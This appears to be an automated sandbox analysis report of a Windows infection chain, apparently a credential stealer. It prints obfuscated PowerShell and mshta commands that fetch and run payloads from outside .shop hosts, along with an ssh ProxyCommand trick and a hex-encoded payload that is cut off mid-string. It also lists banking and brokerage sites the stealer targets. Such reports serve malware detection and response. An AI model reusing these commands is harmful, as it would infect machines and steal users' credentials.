Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00325D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

20_2_00325D13

Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 49675
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 47789
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59703
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 51793
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 49580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59484
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59266
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59153
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 48907
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59047
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 44026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58938
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 48513
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58718
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59301
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 55286
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 43177
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35804
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 38318
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 53020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 48043
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 42470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 38387
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59549
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 39119
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 30441
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 57573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 52785
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 33844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58741
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 56533
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 59895
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 32195
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 51146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 38736
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 35116
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 56166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 41045
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 58681
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 48467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 39880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 47918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 56563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 55726
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 52655
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 36439
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696503903s
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696503903x
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696503903f
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
Source: updater.exe, updater.exe, 00000014.00000002.1673555216.00000000016CD000.00000040.00000020.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1657302182.0000000001657000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1672927968.0000000001568000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1672927968.0000000001598000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 00000014.00000003.1657302182.0000000001606000.00000004.00000020.00020000.00000000.sdmp, updater.exe, 00000014.00000002.1672927968.00000000015C3000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, AutoIt3.exe, 00000016.00000002.1837975083.0000000001365000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000003.1826222979.0000000001375000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1838669715.00000000013C6000.00000004.00000020.00020000.00000000.sdmp, AutoIt3.exe, 00000016.00000002.1837875409.000000000133A000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft hyper-v video
Source: mshta.exe, 00000006.00000002.1592677380.0000024E63420000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903x
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696503903x
Source: powershell.exe, 00000009.00000002.1564802240.0000028DEE77A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWFA%SystemRoot%\system32\mswsock.dllFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB4AFEAZAA1ACAALQBPAHUAdABGAGkAbABlACAAJABzAFcAZgAyACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcABIAHQANgAgAC0
Source: mshta.exe, 00000006.00000003.1588725610.00000246608A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1579811940.000002466081C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1589642644.00000246608B9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591517566.00000246608BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.000002466081D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1578774556.00000246608A4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.000002466081D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.000002466081D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3040883662.000001D923E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3047485668.000001D929456000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3040797832.000001D923E2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696503903u
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696503903h
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696503903}
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696503903
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696503903\|UE
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
Source: sftp.exe, 00000000.00000002.1595410872.0000027579E38000.00000004.00000020.00020000.00000000.sdmp, ssh.exe, 00000003.00000002.1594904711.000001C5E79B9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1745348120.00000200446C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696503903]
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696503903
Source: mshta.exe, 00000006.00000003.1579811940.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1580679477.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1591232577.0000024660854000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1584878876.0000024660854000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0000024E62788D80-15031cacb
Source: InstallUtil.exe, 00000015.00000002.3800737718.0000000000CBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
Source: AutoIt3.exe, 0000001A.00000002.1912335461.00000000010CA000.00000040.00000020.00020000.00000000.sdmp	Binary or memory string: vmware
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696503903
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696503903
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696503903d
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696503903j
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696503903}
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696503903
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696503903
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696503903
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696503903o
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696503903t
Source: InstallUtil.exe, 00000015.00000002.3807114971.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696503903t

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	API call chain: ExitProcess graph end node	graph_20-111844
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	API call chain: ExitProcess graph end node	graph_20-111772
Source: C:\ehcfdbh\AutoIt3.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_016E56A7 LdrInitializeThunk,

20_2_016E56A7

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_003845D5 BlockInput,

20_2_003845D5

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00325240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

20_2_00325240

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00345CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

20_2_00345CAC

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_0038C6D9 LoadLibraryA,GetProcAddress,

20_2_0038C6D9

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016EB38A mov eax, dword ptr fs:[00000030h]	20_2_016EB38A
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016EB38A mov eax, dword ptr fs:[00000030h]	20_2_016EB38A
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016EB391 mov eax, dword ptr fs:[00000030h]	20_2_016EB391
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016EB391 mov eax, dword ptr fs:[00000030h]	20_2_016EB391
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016E54A5 mov eax, dword ptr fs:[00000030h]	20_2_016E54A5
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_016F72FE mov eax, dword ptr fs:[00000030h]	20_2_016F72FE
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_01364136 mov eax, dword ptr fs:[00000030h]	22_2_01364136
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013581C2 mov eax, dword ptr fs:[00000030h]	22_2_013581C2
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013581C2 mov eax, dword ptr fs:[00000030h]	22_2_013581C2
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013581C9 mov eax, dword ptr fs:[00000030h]	22_2_013581C9
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013581C9 mov eax, dword ptr fs:[00000030h]	22_2_013581C9
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_013522DD mov eax, dword ptr fs:[00000030h]	22_2_013522DD

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_003688CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

20_2_003688CD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0033A354 SetUnhandledExceptionFilter,	20_2_0033A354
Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe	Code function: 20_2_0033A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	20_2_0033A385
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CAA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_00CAA385
Source: C:\ehcfdbh\AutoIt3.exe	Code function: 22_2_00CAA354 SetUnhandledExceptionFilter,	22_2_00CAA354

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Memory protected: page readonly | page read and write | page guard | page no cache

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded $aJw7="updater.exe";$kNr3=-join((65..90)+(97..122)\|ForEach-Object{[char]$_}\|Get-Random -Count 8)+".bin";$jXq4=Join-Path -Path $env:TEMP -ChildPath(-join((48..57\|ForEach-Object{[char]$_})\|Get-Random -Count 8));New-Item -Path $jXq4 -ItemType Directory -Force\|Out-Null;$pHt6=Join-Path -Path $jXq4 -ChildPath $aJw7;$sWf2=Join-Path -Path $jXq4 -ChildPath $kNr3;$vPb9="https://cndef1.green-pathways.shop/api/uz/7552973650/u.bin";$xQd5="https://cndef1.green-pathways.shop/api/uz/7552973650/nnn.bin";Invoke-WebRequest -Uri $vPb9 -OutFile $pHt6 -UseBasicParsing;Invoke-WebRequest -Uri $xQd5 -OutFile $sWf2 -UseBasicParsing;Start-Process -FilePath $pHt6 -ArgumentList $sWf2;& ([scriptblock]::Create((('e'+'xi'+'t') -join '')))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Base64 decoded $aJw7="updater.exe";$kNr3=-join((65..90)+(97..122)\|ForEach-Object{[char]$_}\|Get-Random -Count 8)+".bin";$jXq4=Join-Path -Path $env:TEMP -ChildPath(-join((48..57\|ForEach-Object{[char]$_})\|Get-Random -Count 8));New-Item -Path $jXq4 -ItemType Directory -Force\|Out-Null;$pHt6=Join-Path -Path $jXq4 -ChildPath $aJw7;$sWf2=Join-Path -Path $jXq4 -ChildPath $kNr3;$vPb9="https://cndef1.green-pathways.shop/api/uz/7552973650/u.bin";$xQd5="https://cndef1.green-pathways.shop/api/uz/7552973650/nnn.bin";Invoke-WebRequest -Uri $vPb9 -OutFile $pHt6 -UseBasicParsing;Invoke-WebRequest -Uri $xQd5 -OutFile $sWf2 -UseBasicParsing;Start-Process -FilePath $pHt6 -ArgumentList $sWf2;& ([scriptblock]::Create((('e'+'xi'+'t') -join '')))			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00369369 LogonUserW,

20_2_00369369

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00325240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

20_2_00325240

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_00371AC6 SendInput,keybd_event,

20_2_00371AC6

Source: C:\Users\user\AppData\Local\Temp\71532689\updater.exe

Code function: 20_2_003751E2 mouse_event,

20_2_003751E2

Source: C:\Windows\System32\OpenSSH\sftp.exe	Process created: C:\Windows\System32\OpenSSH\ssh.exe "C:\Windows\System32\OpenSSH\ssh.exe" "-oForwardX11 no" "-oForwardAgent no" "-oPermitLocalCommand no" "-oClearAllForwardings yes" -o "ProxyCommand=powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')" "-oProtocol 2" -s -- . sftp	Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command ('m]]]]]]sh]]]]]]]t]]]]]a]]]]]]].]]]]]ex]]]]]]]e]]]]] h]]]]]tt]]]ps:]]]]]]/]]]]]]/s]]]]]t]]]]]]]atic]]].kli]]]]]]]pxuh]]]]]aq.sh]]]]]]]op/3]VKKE]]]].mp4]]' -replace ']')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://static.klipxuhaq.shop/3VKKE.mp4"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://static.klipxuhaq.shop/3VKKE.mp4	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function wrdZ($UvhG){return -split ($UvhG -replace '..', '0x$& ')};$ERHgk = wrdZ('ECA586FB867E54D080F88AB849BFB94F298E9D4D174F6B1F2F81610C3540C56191E34FB7B2DF87630478E180DACA97337CF338C5F0549579E18CC1A49A1339F9691FAE2EDAAC0D6E2AB4913030D45E7F9C40731A7B0ED45F438D15D573AB5E4816A3D8CA82DAA342D630EDB6E24E85F4D05E0447A728444A18214CD35DB1FD5C4C677BF1EB6DD62A0D4B42A5F996D056A8C58BF2B2ADC007CA0004F35EEDF7DB06CC47C0E8175257375360952646DDCE12F86A389A2FB4F08F04DF71ABBD10CA19394807E45AE262B4CF2BD880666BE9808038992E086339CA69F730462BD5BA268BEA9591B45C3FDDC4B990452C3C5B083B1D8A99DB9D344BE7F259679F7994FBAA4E272654402905FEB107236FDE83FA247F6DFF5EE2DE2FBE984DE8D33A5077EC31D65DAE7AAC344DB18BADD0E59C3DC0A20AA1776387E75ED82F6F21E81D436D435FE7641490C8BB3BE615F9D76B1F8A1323001EC29CB1DC720A20647927291ABFCCFF409B1F94A878B0CDB0AFF68E11DAF8B2CCB95D3B395C11FB1D2F79673936E5F6AF545B019BFDE71CDAC1667709524F9244C6D8B3198F1F28C92F507AF233B70FD15099184E521AA3D1F4EB4613BE4CC9617FD5EE373CB05A7B164A2B6211387C494F7FC2F64FB4B0EEC11B39FFCC4E09EE10E96070192D4E0E2AD737B857A3BA8766EF8B454E4CC9BAE60331184407821C7F5A417DEBB95885CD929FAC64B5913D45E20BA92710C789EA36BC01ED629BAAEEFB8F420E9D966E4669DB7E1EE213C1001073B4FB67BB454BA80B0144D096E4FA221E9AB74FB2FDA2CBBA9C669EB50610B810047A6A75A1E41407350666C1B141836EA4FB3C9588111CE216EB2E451248C7008EA09561E08463428A981B69214151A19DD58483CB4A07DA879953AA3FDBF8EC16A79ACD16FBF54B34E405FCE7D15727908982C71DB4EC3160579745FCBC610756535558573F49618C7606881E9C8F026001D9C1C40FD2462CC1EC3D